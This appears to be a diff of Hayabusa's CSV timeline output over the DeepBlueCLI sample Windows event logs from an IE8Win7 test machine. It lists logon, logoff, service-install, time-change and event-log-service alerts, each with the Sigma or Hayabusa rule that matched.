+2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
